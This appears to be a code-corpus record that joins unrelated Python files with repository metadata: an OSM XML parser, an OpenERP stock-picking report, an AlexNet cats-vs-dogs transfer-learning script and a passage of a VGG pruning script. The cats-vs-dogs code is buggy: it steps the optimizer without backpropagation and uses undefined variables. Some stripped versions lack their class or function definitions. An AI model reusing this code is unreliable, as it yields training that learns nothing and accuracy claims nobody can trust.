""" pythonify ~~~~~~~~ Converts an OSM XML file into a number of Python dictionaries. This process is slow, and (very) memory intensive, so can be split into a number of parts. We also support saving and loading the results from compressed pickle'd files (these should be viewed a temporary files, which are unlikely to be compatible across different Python runtime systems.) """ from . import digest as _digest import pickle as _pickle import lzma as _lzma import array as _array import bisect as _bisect from collections import defaultdict as _defaultdict def unpickle(filename): """Load an object from a .xz compressed pickle file.""" with _lzma.open(filename, "rb") as file: return _pickle.load(file) def pickle(object, filename): """Save an object to a .xz compressed pickle file.""" with _lzma.open(filename, "wb") as file: return _pickle.dump(object, file) def _all_elements(file): gen = _digest.parse(file) osm, bounds = next(gen), next(gen) if not isinstance(osm, _digest.OSM) or not isinstance(bounds, _digest.Bounds): raise Exception("Unexpected initial two elements. Has the XML file format changed?") yield from gen def _all_elements_of_type(file, typename, fast=True): if not fast: yield from (element for element in _all_elements(file) if element.name == typename ) else: for element in _all_elements(file): if element.name == typename: yield element else: if typename == "node": return elif typename == "way" and element.name == "relation": return class Nodes(): """Extracts the coordinate data (only) for the nodes. Stores data in a dictionary. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse. :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. 
""" def __init__(self, file, fast=True): self._nodes = dict() for node in _all_elements_of_type(file, "node", fast): self._nodes[node.osm_id] = (node.longitude, node.latitude) def __getitem__(self, index): if index in self._nodes: return self._nodes[index] raise KeyError() def __iter__(self): yield from self._nodes.items() class NodesPacked(): """A more efficient storage method than the :class:`Nodes` implements, but at the cost of slower querying. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ def __init__(self, file, fast=True): if file is not None: interim_list = [] for node in _all_elements_of_type(file, "node", fast): interim_list.append( (node.osm_id, node.longitude, node.latitude) ) self._osm_ids, self._longitude, self._latitude = self._arrays_from_unordered_list(interim_list) else: self._osm_ids, self._longitude, self._latitude = None, None, None def __getitem__(self, index): i = _bisect.bisect_left(self._osm_ids, index) if i == len(self._osm_ids) or self._osm_ids[i] != index: raise KeyError() lon, lat = self._longitude[i], self._latitude[i] return lon / 1e7, lat / 1e7 def __iter__(self): for osm_id, lon, lat in zip(self._osm_ids, self._longitude, self._latitude): yield (osm_id, (lon / 1e7, lat / 1e7)) @staticmethod def _from_float(fl): if fl >= 0: return int(fl * 1e7 + 0.5) return int(fl * 1e7 - 0.5) @staticmethod def _arrays_from_unordered_list(input): input.sort(key = lambda tri : tri[0]) osm_ids = _array.array("Q") lons, lats = _array.array("l"), _array.array("l") for (osm_id, lon, lat) in input: osm_ids.append(osm_id) lons.append(NodesPacked._from_float(lon)) lats.append(NodesPacked._from_float(lat)) return osm_ids, lons, lats @staticmethod def from_Nodes(nodes): """Construct a new instance from an instance of :class:`Nodes`.""" 
new = NodesPacked(None) interim_list = [ (osm_id, lon, lat) for osm_id, (lon, lat) in nodes._nodes.items() ] new._osm_ids, new._longitude, new._latitude = NodesPacked._arrays_from_unordered_list(interim_list) return new class Ways(): """Extracts (only) the list of nodes for each way. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ def __init__(self, file, fast=True): self._ways = dict() for way in _all_elements_of_type(file, "way", fast): self._ways[way.osm_id] = way.nodes def __getitem__(self, index): if index in self._ways: return self._ways[index] raise KeyError() def __iter__(self): yield from self._ways.items() class Relations(): """Extracts (only) the list of members of each relation. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ def __init__(self, file, fast=True): self._rels = dict() for rel in _all_elements_of_type(file, "relation", fast): self._rels[rel.osm_id] = rel.members def __getitem__(self, index): if index in self._rels: return self._rels[index] raise KeyError() def __iter__(self): yield from self._rels.items() class Tags(): """Stores all the tags in a lookup optimised for finding the objects (nodes, ways and relations) which have a given tag. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse. 
""" def __init__(self, file): self.from_nodes = _defaultdict(list) self.from_ways = _defaultdict(list) self.from_relations = _defaultdict(list) lookup = {"node" : self.from_nodes, "way": self.from_ways, "relation": self.from_relations } for element in _all_elements(file): d = lookup[element.name] for key_pair in element.tags.items(): d[key_pair].append(element.osm_id) @staticmethod def _by_key_pair(dictionary, key_pair): if key_pair in dictionary: return dictionary[key_pair] return [] @staticmethod def _by_key(dictionary, key): out = [] for key_pair in dictionary: if key_pair[0] == key: for osm_id in dictionary[key_pair]: out.append( (key_pair[1], osm_id) ) return out @property def all_node_tags(self): """Set of all `(key, value)` pairs of tags of nodes.""" return set(self.from_nodes) @property def all_node_tag_keys(self): """Set of all keys which occur on tags of nodes.""" return set(k for (k,v) in self.from_nodes) @property def all_way_tags(self): """Set of all `(key, value)` pairs of tags of ways.""" return set(self.from_ways) @property def all_way_tag_keys(self): """Set of all keys which occur on tags of ways.""" return set(k for (k,v) in self.from_ways) @property def all_relation_tags(self): """Set of all `(key, value)` pairs of tags of relations.""" return set(self.from_relations) @property def all_relation_tag_keys(self): """Set of all keys which occur on tags of relations.""" return set(k for (k,v) in self.from_relations) def from_key_value(self, key, value): """Return a list of all element which have the tag `{key: value}`. :param key: The key to search for tags with. :param value: The value to search for tags with. :return: A list of pairs `(typename, osm_id)` where `typename` is one of "node", "way" or "relation" and `osm_id` is the id of the element. 
""" out = [] for osm_id in self.nodes((key, value)): out.append(("node", osm_id)) for osm_id in self.ways((key, value)): out.append(("way", osm_id)) for osm_id in self.relations((key, value)): out.append(("relation", osm_id)) return out def from_key(self, key): """Return a list of all element which have the tag `key`. :param key: The key to search for tags with. :return: A list of triple `(typename, value, osm_id)` where `typename` is one of "node", "way" or "relation", `value` is the value of the tag, and `osm_id` is the id of the element. """ out = [] for value, osm_id in self.nodes_from_key(key): out.append(("node", value, osm_id)) for value, osm_id in self.ways_from_key(key): out.append(("way", value, osm_id)) for value, osm_id in self.relations_from_key(key): out.append(("relation", value, osm_id)) return out def nodes(self, key_pair): """Returns a list of all the nodes which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of nodes with this tag. """ return self._by_key_pair(self.from_nodes, key_pair) def nodes_from_key(self, key): """Returns a list of all the nodes which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the node. """ return self._by_key(self.from_nodes, key) def ways(self, key_pair): """Returns a list of all the ways which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of ways with this tag. """ return self._by_key_pair(self.from_ways, key_pair) def ways_from_key(self, key): """Returns a list of all the ways which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the way. 
""" return self._by_key(self.from_ways, key) def relations(self, key_pair): """Returns a list of all the relations which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of relations with this tag. """ return self._by_key_pair(self.from_relations, key_pair) def relations_from_key(self, key): """Returns a list of all the relations which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the relation. """ return self._by_key(self.from_relations, key) class TagsById(): """A lookup from osm id number to tags. :param tags: An instance of :class:`Tags`. """ def __init__(self, tags): if not isinstance(tags, Tags): raise ValueError("Need an instance of Tags for construction.") self._nodes = _defaultdict(dict) self._ways = _defaultdict(dict) self._relations = _defaultdict(dict) self._populate(tags.from_nodes, self._nodes) self._populate(tags.from_ways, self._ways) self._populate(tags.from_relations, self._relations) @staticmethod def _populate(input, output): for (key, value), ids in input.items(): for osm_id in ids: output[osm_id][key] = value def node(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._nodes: return self._nodes[osm_id] return dict() def way(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._ways: return self._ways[osm_id] return dict() def relation(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._relations: return self._relations[osm_id] return dict() def pythonify_and_pickle(file, out_filename): """Convert all the data in the XML file and save as pickled files for nodes, ways, relations and tags separately. 
:param file: Filename (the file will be opened 4 times, so passing a file object will not work). Can be anything which :module:`digest` can parse. :param out_filename: If is `test` then writes files `test_nodes.pic.xz` through `test_tags.pic.xz` :return: A tuple of the 4 output filenames for nodes, ways, relations and tags. """ obj = NodesPacked(file) out = [out_filename + "_nodes.pic.xz"] pickle(obj, out[0]) for typpe, name in [(Ways, "ways"), (Relations, "relations"), (Tags, "tags")]: obj = None obj = typpe(file) name = "{}_{}.pic.xz".format(out_filename, name) pickle(obj, name) out.append(name) return out
4,228
0
608
27998331b309e55cd8a388ea6423e56a7a5e56ce
3,081
py
Python
odoo/custom/src/private/rml_reports/stock/picking.py
ecosoft-odoo/mh-doodba
093f14850aaff337951b4829b24bf32eee6e6d40
[ "BSL-1.0" ]
1
2021-10-03T08:11:18.000Z
2021-10-03T08:11:18.000Z
odoo/custom/src/private/rml_reports/stock/picking.py
ecosoft-odoo/mh-doodba
093f14850aaff337951b4829b24bf32eee6e6d40
[ "BSL-1.0" ]
null
null
null
odoo/custom/src/private/rml_reports/stock/picking.py
ecosoft-odoo/mh-doodba
093f14850aaff337951b4829b24bf32eee6e6d40
[ "BSL-1.0" ]
null
null
null
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import time from report import report_sxw from osv import osv import pooler report_sxw.report_sxw('report.stock.picking.list.mh','stock.picking.out','',parser=picking, header="internal") # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
45.308824
123
0.61863
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import time from report import report_sxw from osv import osv import pooler class picking(report_sxw.rml_parse): def __init__(self, cr, uid, name, context): super(picking, self).__init__(cr, uid, name, context=context) self.localcontext.update({ 'time': time, 'get_product_desc':self.get_product_desc, 'display_invoice_address':self.display_invoice_address }) def get_product_desc(self,move_line): desc = move_line.name.replace(move_line.product_id.default_code,'').replace('[]','') if move_line.product_id.partner_barcode: desc = desc + ' ' + '(' + move_line.product_id.partner_barcode + ')' desc = desc + ' ' + '[' + move_line.product_id.product_main_code + ']' return desc def display_invoice_address(self,picking): # Only for this report, update printed = True self.pool.get('stock.picking.out').write(self.cr, self.uid, picking.id, {'printed':True}) # Get the SO order_obj = self.pool.get('sale.order') order_ids = order_obj.search(self.cr, self.uid, [('name','=',picking.origin)], limit=1) if len(order_ids) == 0: # Sale Order not found. 
return False order = order_obj.browse(self.cr, self.uid, order_ids[0]) # Get Invoice Address object if not (order.partner_invoice_id and order.partner_invoice_id.id): return False address_string = (order.partner_invoice_id.title.name or '') + ' ' + order.partner_invoice_id.name + '\n' address_string += self.pool.get('res.partner')._display_address(self.cr, self.uid, order.partner_invoice_id) + '\n' address_string += order.partner_invoice_id.phone or order.partner_invoice_id.email or '' return address_string report_sxw.report_sxw('report.stock.picking.list.mh','stock.picking.out','',parser=picking, header="internal") # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
1,703
15
126
d4c29d051bf16489715a8cedb73ff6c590a2f1fb
7,846
py
Python
CatVsDogs(TestLoop,DogsOverfitting97%,Cats(veryLess)).py
shyamgupta196/LearningPyTorch
a585b708039357207ad4d3b29a3fc7bd2d1cc7e8
[ "Apache-2.0" ]
1
2021-04-06T11:26:39.000Z
2021-04-06T11:26:39.000Z
CatVsDogs(TestLoop,DogsOverfitting97%,Cats(veryLess)).py
shyamgupta196/LearningPyTorch
a585b708039357207ad4d3b29a3fc7bd2d1cc7e8
[ "Apache-2.0" ]
null
null
null
CatVsDogs(TestLoop,DogsOverfitting97%,Cats(veryLess)).py
shyamgupta196/LearningPyTorch
a585b708039357207ad4d3b29a3fc7bd2d1cc7e8
[ "Apache-2.0" ]
null
null
null
""" In this TorchDaily we will TRAIN A MODEL USING TRANSFER LEARNING Cats Vs Dogs Dataset EARLIER ACC==14% OR LESS NOW ITS 70% AND MORE (BUT ONLY FOR DOGS ) ### Cats are very poorly classified (IDK WHY but soon i will figure that out) THE POWER OF ALEXNET (PRETRAINED MODELS IS VISIBLE) DATE ==> 10-05-21 """ import torch import torch.nn as nn from torch.utils.data import DataLoader import matplotlib.pyplot as plt from torchvision import transforms, datasets, models import torchvision from tqdm import tqdm import os import PIL.Image as Image device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print(device) # prepare data convert = transforms.Compose( [ transforms.Resize((128, 128)), transforms.RandomHorizontalFlip(0.2), transforms.ToTensor(), ] ) # dataloader data = datasets.ImageFolder(root="PetImages/", transform=convert) Loader = DataLoader(data, batch_size=64, shuffle=True) MAP = {0: "Cat", 1: "Dog"} ##UNCOMMENT FOR SEEING THE DATA IMAGES # fig, ax = plt.subplots(8, 8, figsize=(20, 20)) # fig.suptitle("Dogs And Cats IMages") # for i, (img, lab) in zip(range(0, 8 * 8), Loader): # x = i // 8 # y = i % 8 # print(f"{x},{y}") # ax[x, y].imshow(img[i].squeeze().permute(1,2,0)) # ax[x, y].set_title(f"{lab[i]}") # ax[x, y].axis("off") # plt.show() # # Add on classifier # # HOW TO CHANGE THE INPUT LAYER WHICH ACCEPTS THE 224*224 INPUT # # I WANNA CHANGE THAT TO 128*128 THIS SIZE WILL SUFFICE # We Use AlexNet for transfer learning ##answers below alexnet = torchvision.models.alexnet(pretrained=True) for param in alexnet.parameters(): param.requires_grad = False # Add a avgpool here avgpool = nn.AdaptiveAvgPool2d((7, 7)) # Replace the classifier layer # to customise it according to our output alexnet.classifier = nn.Sequential( nn.Linear(256 * 7 * 7, 1024), nn.Linear(1024, 256), nn.Linear(256, 2), ) # putting model in a training mode alexnet.train() print(alexnet) criterion = nn.CrossEntropyLoss() optimizer = torch.optim.Adam(alexnet.parameters(), 
lr=0.001) EPOCHS = 1 TRAIN = False losses = [] if TRAIN: training_loop(alexnet, optimizer, EPOCHS) plt.plot(losses) plt.show() TEST = False history = [] if TEST: test() print("Validation Complete") with open("ModelHistory.txt", "w") as f: for i in history: f.writelines(f"{i}") print("Validation Complete") ## This model reported a accuracy of 97%(on DOGS ONLY) using AlexNet ## the Pros of using a pretrained model is clearly seen here ## date -- 13th May 2021 (thursday) ####ACCURACY AND OTHER THINGS TOO TO BE APPENDED SOON ###### PREDICT = True def predict(model, test_image_name): """ Function to predict the class of a single test image Parameters :param model: Model to test :param test_image_name: Test image """ transform = transforms.Compose( [transforms.Resize((128, 128)), transforms.ToTensor()] ) test_image = Image.open(test_image_name) test_image_tensor = transform(test_image).to(device) plt.imshow(test_image) plt.imshow(test_image_tensor.squeeze().permute(1, 2, 0)) plt.show() with torch.no_grad(): model.eval() # Model outputs log probabilities test_image_tensor = test_image_tensor.unsqueeze(0) print(test_image_tensor.shape) x = alexnet.features(test_image_tensor) x = avgpool(x) x = x.view(-1, 256 * 7 * 7) out = alexnet.classifier(x) ps = torch.exp(out) topk, topclass = ps.topk(2, dim=1) for i in range(2): print( "Predcition", i + 1, ":", f"topclass {topclass.numpy()}", MAP[topclass.numpy()[0][i]], ", Score: ", f"topk {topk.numpy()}", topk.numpy()[0][i], ) print(f"out: {out}") if PREDICT: checkpoint = torch.load("catsvdogs.pth") alexnet.load_state_dict(checkpoint["state_dict"]) optimizer.load_state_dict(checkpoint["optimizer"]) for params in alexnet.parameters(): params.requires_grad == False predict(alexnet, "PetTest/CatTest.jpg")
29.8327
114
0.582207
""" In this TorchDaily we will TRAIN A MODEL USING TRANSFER LEARNING Cats Vs Dogs Dataset EARLIER ACC==14% OR LESS NOW ITS 70% AND MORE (BUT ONLY FOR DOGS ) ### Cats are very poorly classified (IDK WHY but soon i will figure that out) THE POWER OF ALEXNET (PRETRAINED MODELS IS VISIBLE) DATE ==> 10-05-21 """ import torch import torch.nn as nn from torch.utils.data import DataLoader import matplotlib.pyplot as plt from torchvision import transforms, datasets, models import torchvision from tqdm import tqdm import os import PIL.Image as Image device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print(device) # prepare data convert = transforms.Compose( [ transforms.Resize((128, 128)), transforms.RandomHorizontalFlip(0.2), transforms.ToTensor(), ] ) # dataloader data = datasets.ImageFolder(root="PetImages/", transform=convert) Loader = DataLoader(data, batch_size=64, shuffle=True) MAP = {0: "Cat", 1: "Dog"} ##UNCOMMENT FOR SEEING THE DATA IMAGES # fig, ax = plt.subplots(8, 8, figsize=(20, 20)) # fig.suptitle("Dogs And Cats IMages") # for i, (img, lab) in zip(range(0, 8 * 8), Loader): # x = i // 8 # y = i % 8 # print(f"{x},{y}") # ax[x, y].imshow(img[i].squeeze().permute(1,2,0)) # ax[x, y].set_title(f"{lab[i]}") # ax[x, y].axis("off") # plt.show() # # Add on classifier # # HOW TO CHANGE THE INPUT LAYER WHICH ACCEPTS THE 224*224 INPUT # # I WANNA CHANGE THAT TO 128*128 THIS SIZE WILL SUFFICE # We Use AlexNet for transfer learning ##answers below alexnet = torchvision.models.alexnet(pretrained=True) for param in alexnet.parameters(): param.requires_grad = False # Add a avgpool here avgpool = nn.AdaptiveAvgPool2d((7, 7)) # Replace the classifier layer # to customise it according to our output alexnet.classifier = nn.Sequential( nn.Linear(256 * 7 * 7, 1024), nn.Linear(1024, 256), nn.Linear(256, 2), ) # putting model in a training mode alexnet.train() print(alexnet) criterion = nn.CrossEntropyLoss() optimizer = torch.optim.Adam(alexnet.parameters(), 
lr=0.001) EPOCHS = 1 TRAIN = False losses = [] def training_loop(model, optimizer, epochs): for epoch in range(epochs): try: for img, lab in tqdm(Loader): img = img.to(device) lab = lab.to(device) x = alexnet.features(img) x = avgpool(x) x = x.view(-1, 256 * 7 * 7) predictions = alexnet.classifier(x) loss = criterion(predictions, lab) optimizer.step() optimizer.zero_grad() losses.append(loss.item()) print(f"loss: {loss.item():.4f}") except Exception as e: print(str(e)) state = { "epoch": epoch, "state_dict": alexnet.state_dict(), "optimizer": optimizer.state_dict(), } torch.save(state, "catsvdogs.pth") if TRAIN: training_loop(alexnet, optimizer, EPOCHS) plt.plot(losses) plt.show() TEST = False history = [] def test(): test = datasets.ImageFolder(root="PetTest/", transform=convert) testLoader = DataLoader(test, batch_size=16, shuffle=False) checkpoint = torch.load("catsvdogs.pth") alexnet.load_state_dict(checkpoint["state_dict"]) optimizer.load_state_dict(checkpoint["optimizer"]) for params in alexnet.parameters(): params.requires_grad == False print(alexnet) with torch.no_grad(): # Set to evaluation mode alexnet.eval() train_data_size = 101 valid_data_size = 101 # Validation loop # Loss and Accuracy within the epoch valid_loss = 0.0 valid_acc = 0.0 for j, (inputs, labels) in enumerate(testLoader): inputs = inputs.to(device) labels = labels.to(device) # Forward pass - compute outputs on input data using the model x = alexnet.features(inputs) x = avgpool(x) x = x.view(-1, 256 * 7 * 7) outputs = alexnet.classifier(x) # Compute loss loss = criterion(outputs, labels) # Compute the total loss for the batch and add it to valid_loss valid_loss += loss.item() * inputs.size(0) # Calculate validation accuracy ret, predictions = torch.max(outputs.data, 1) correct_counts = predictions.eq(labels.data.view_as(predictions)) # Convert correct_counts to float and then compute the mean acc = torch.mean(correct_counts.type(torch.FloatTensor)) # Compute total accuracy in the whole 
batch and add to valid_acc valid_acc += acc.item() * inputs.size(0) print( """Validation Batch number: {:03d}, Validation: Loss: {:.4f}, Accuracy: {:.4f}""".format(j, loss.item(), acc.item() ) ) # Find average training loss and training accuracy avg_valid_loss = valid_loss / valid_data_size avg_valid_acc = valid_acc / valid_data_size history.append([avg_valid_loss, avg_valid_acc]) print( " Training: Loss: {:.4f}, Accuracy: {:.4f}%, \n\t\tValidation : Loss : {:.4f}, Accuracy: {:.4f}%".format( avg_train_loss, avg_train_acc * 100, avg_valid_loss, avg_valid_acc * 100, ) ) plt.plot(valid_acc) plt.plot(valid_loss) plt.show() if TEST: test() print("Validation Complete") with open("ModelHistory.txt", "w") as f: for i in history: f.writelines(f"{i}") print("Validation Complete") ## This model reported a accuracy of 97%(on DOGS ONLY) using AlexNet ## the Pros of using a pretrained model is clearly seen here ## date -- 13th May 2021 (thursday) ####ACCURACY AND OTHER THINGS TOO TO BE APPENDED SOON ###### PREDICT = True def predict(model, test_image_name): """ Function to predict the class of a single test image Parameters :param model: Model to test :param test_image_name: Test image """ transform = transforms.Compose( [transforms.Resize((128, 128)), transforms.ToTensor()] ) test_image = Image.open(test_image_name) test_image_tensor = transform(test_image).to(device) plt.imshow(test_image) plt.imshow(test_image_tensor.squeeze().permute(1, 2, 0)) plt.show() with torch.no_grad(): model.eval() # Model outputs log probabilities test_image_tensor = test_image_tensor.unsqueeze(0) print(test_image_tensor.shape) x = alexnet.features(test_image_tensor) x = avgpool(x) x = x.view(-1, 256 * 7 * 7) out = alexnet.classifier(x) ps = torch.exp(out) topk, topclass = ps.topk(2, dim=1) for i in range(2): print( "Predcition", i + 1, ":", f"topclass {topclass.numpy()}", MAP[topclass.numpy()[0][i]], ", Score: ", f"topk {topk.numpy()}", topk.numpy()[0][i], ) print(f"out: {out}") if PREDICT: 
checkpoint = torch.load("catsvdogs.pth") alexnet.load_state_dict(checkpoint["state_dict"]) optimizer.load_state_dict(checkpoint["optimizer"]) for params in alexnet.parameters(): params.requires_grad == False predict(alexnet, "PetTest/CatTest.jpg")
3,367
0
50
10a37586581b383194d5be72752acbb49c929082
40,380
py
Python
score_based_pruning.py
Joey61Liuyi/Early-Bird-Tickets
7bb23243bc4343519d58d828f0d3254e80c5fedd
[ "MIT" ]
null
null
null
score_based_pruning.py
Joey61Liuyi/Early-Bird-Tickets
7bb23243bc4343519d58d828f0d3254e80c5fedd
[ "MIT" ]
null
null
null
score_based_pruning.py
Joey61Liuyi/Early-Bird-Tickets
7bb23243bc4343519d58d828f0d3254e80c5fedd
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # @Time : 2021/12/27 16:34 # @Author : LIU YI import argparse import copy import random import pandas as pd import numpy as np import os import torch import torch.nn as nn from torch.autograd import Variable from torchvision import datasets, transforms import wandb # from models import * import models import wandb # os.environ['CUDA_VISIBLE_DEVICES'] = '4' from model_complexity import get_model_infos if __name__ == '__main__': parser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR prune') parser.add_argument('--dataset', type=str, default='cifar100', help='training dataset (default: cifar10)') parser.add_argument('--test-batch-size', type=int, default=128, metavar='N', help='input batch size for testing (default: 256)') parser.add_argument('--no-cuda', action='store_true', default=False, help='disables CUDA training') parser.add_argument('--depth', type=int, default=16, help='depth of the vgg') parser.add_argument('--percent', type=float, default=0.5, help='scale sparse rate (default: 0.5)') parser.add_argument('--model', default='', type=str, metavar='PATH', help='path to the model (default: none)') parser.add_argument('--save', default='./baseline/vgg16-cifar100', type=str, metavar='PATH', help='path to save pruned model (default: none)') parser.add_argument('--save_1', default='./baseline/vgg16-cifar100', type=str, metavar='PATH', help='path to save pruned model (default: none)') parser.add_argument('--start_epoch', default=1, type=int, metavar='N', help='manual start epoch number') parser.add_argument('--end_epoch', default=160, type=int, metavar='N', help='manual end epoch number') # quantized parameters parser.add_argument('--bits_A', default=8, type=int, help='input quantization bits') parser.add_argument('--bits_W', default=8, type=int, help='weight quantization bits') parser.add_argument('--bits_G', default=8, type=int, help='gradient quantization bits') parser.add_argument('--bits_E', default=8, type=int, help='error 
quantization bits') parser.add_argument('--bits_R', default=16, type=int, help='rand number quantization bits') parser.add_argument('--arch', default='vgg', type=str, help='architecture to use') # multi-gpus parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() seed = 1 random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) if not os.path.exists(args.save): os.makedirs(args.save) gpu = args.gpu_ids gpu_ids = args.gpu_ids.split(',') args.gpu_ids = [] for gpu_id in gpu_ids: id = int(gpu_id) if id > 0: args.gpu_ids.append(id) if len(args.gpu_ids) > 0: torch.cuda.set_device(args.gpu_ids[0]) device = torch.device("cuda" if torch.cuda.is_available() else "cpu") if args.arch.endswith('lp'): # model = models.__dict__[args.arch](bits_A=args.bits_A, bits_E=args.bits_E, bits_W=args.bits_W, dataset=args.dataset, depth=args.depth) model = models.__dict__[args.arch](8, 8, 32, dataset=args.dataset, depth=args.depth) elif args.dataset == 'imagenet': model = models.__dict__[args.arch](pretrained=False) if len(args.gpu_ids) > 1: model = torch.nn.DataParallel(model, device_ids=args.gpu_ids) else: model = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth) if args.dataset == 'cifar10': train_loader = torch.utils.data.DataLoader( datasets.CIFAR10('./data.cifar10', train=True, download=True, transform=transforms.Compose([ transforms.Pad(4), transforms.RandomCrop(32), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) test_loader = torch.utils.data.DataLoader( datasets.CIFAR10('./data.cifar10', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) else: 
train_loader = torch.utils.data.DataLoader( datasets.CIFAR100('./data.cifar100', train=True, download=True, transform=transforms.Compose([ transforms.Pad(4), transforms.RandomCrop(32), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) test_loader = torch.utils.data.DataLoader( datasets.CIFAR100('./data.cifar100', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) if args.cuda: model.cuda() wandb_project = 'pruning_score' name = 'with_out_normalization_60' # wandb.init(project=wandb_project, name=name) # # random_search(cfg_mask_all, args.percent) # channel_score_search(model, args.percent, train_loader) # greedy_search(model, args.percent, train_loader) # layer_remove_check(model, train_loader) # rate_check(model, args.percent, train_loader) channel_remove_check(model, train_loader, 0.61, 0.2) # layer_wise_pruning(model, train_loader, 0.8) # # data = np.load('1633.66.npy', allow_pickle=True) # data = data.item() # cfg = data['cfg'] # cfg_mask = data['mask_cfg'] # for i in range(len(cfg_mask)): # cfg_mask[i] = np.asarray(cfg_mask[i].cpu().numpy()) # score = check_score(model, cfg, cfg_mask) # print(score)
37.879925
146
0.58316
# -*- coding: utf-8 -*- # @Time : 2021/12/27 16:34 # @Author : LIU YI import argparse import copy import random import pandas as pd import numpy as np import os import torch import torch.nn as nn from torch.autograd import Variable from torchvision import datasets, transforms import wandb # from models import * import models import wandb # os.environ['CUDA_VISIBLE_DEVICES'] = '4' from model_complexity import get_model_infos def create_model(model, cfg, cfg_mask): while 0 in cfg: cfg.remove(0) # if args.arch.endswith('lp'): # # model = models.__dict__[args.arch](bits_A=args.bits_A, bits_E=args.bits_E, bits_W=args.bits_W, dataset=args.dataset, depth=args.depth) # newmodel = models.__dict__[args.arch](8, 8, 32, dataset=args.dataset, depth=args.depth) # elif args.dataset == 'imagenet': # newmodel = models.__dict__[args.arch](pretrained=False) # if len(args.gpu_ids) > 1: # model = torch.nn.DataParallel(model, device_ids=args.gpu_ids) # else: newmodel = models.__dict__['vgg'](dataset='cifar100', cfg = cfg) # for [m0, m1] in zip(model.modules(), newmodel.modules()): # if isinstance(m0, nn.BatchNorm2d): # if np.sum(end_mask) == 0: # continue # idx1 = np.squeeze(np.argwhere(end_mask)) # if idx1.size == 1: # idx1 = np.resize(idx1, (1,)) # m1.weight.data = m0.weight.data[idx1.tolist()].clone() # m1.bias.data = m0.bias.data[idx1.tolist()].clone() # m1.running_mean = m0.running_mean[idx1.tolist()].clone() # m1.running_var = m0.running_var[idx1.tolist()].clone() # layer_id_in_cfg += 1 # start_mask = copy.copy(end_mask) # if layer_id_in_cfg < len(cfg_mask): # do not change in Final FC # end_mask = cfg_mask[layer_id_in_cfg] # elif isinstance(m0, nn.Conv2d): # if np.sum(end_mask) == 0: # continue # idx0 = np.squeeze(np.argwhere(start_mask)) # idx1 = np.squeeze(np.argwhere(end_mask)) # # random set for test # # new_end_mask = np.asarray(end_mask.cpu().numpy()) # # new_end_mask = np.append(new_end_mask[int(len(new_end_mask)/2):], new_end_mask[:int(len(new_end_mask)/2)]) # # idx1 = 
